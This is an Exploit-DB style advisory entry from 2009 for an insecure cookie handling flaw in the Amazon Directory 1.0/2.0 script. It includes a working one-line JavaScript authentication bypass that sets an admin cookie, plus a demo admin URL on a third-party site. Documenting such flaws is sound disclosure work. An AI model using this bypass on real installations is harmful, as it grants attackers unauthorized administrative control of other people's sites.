Amazon Directory Version 1.0/2.0 Insecure Cookie Handling Vulnerability

vendor:

Amazon Directory

by:

TiGeR-Dz

7,5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: Amazon Directory

Affected Version From: 1.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:amazon_directory

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Amazon Directory Version 1.0/2.0 Insecure Cookie Handling Vulnerability

A vulnerability in Amazon Directory Version 1.0/2.0 allows an attacker to gain administrative access by setting a cookie. An attacker can exploit this vulnerability by setting the cookie 'amazonadmin=logged%20in;path=/' using JavaScript.

Mitigation:

Ensure that cookies are properly validated and that only authorized users are allowed to set cookies.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Amazon Directory Version 1.0/2.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Amazon Directory Version 1.0/2.0
Download:http://www.mrcgiguy.com/amazon_directory.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="amazonadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.myhotlinks.net/cgi-bin/amazon2/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]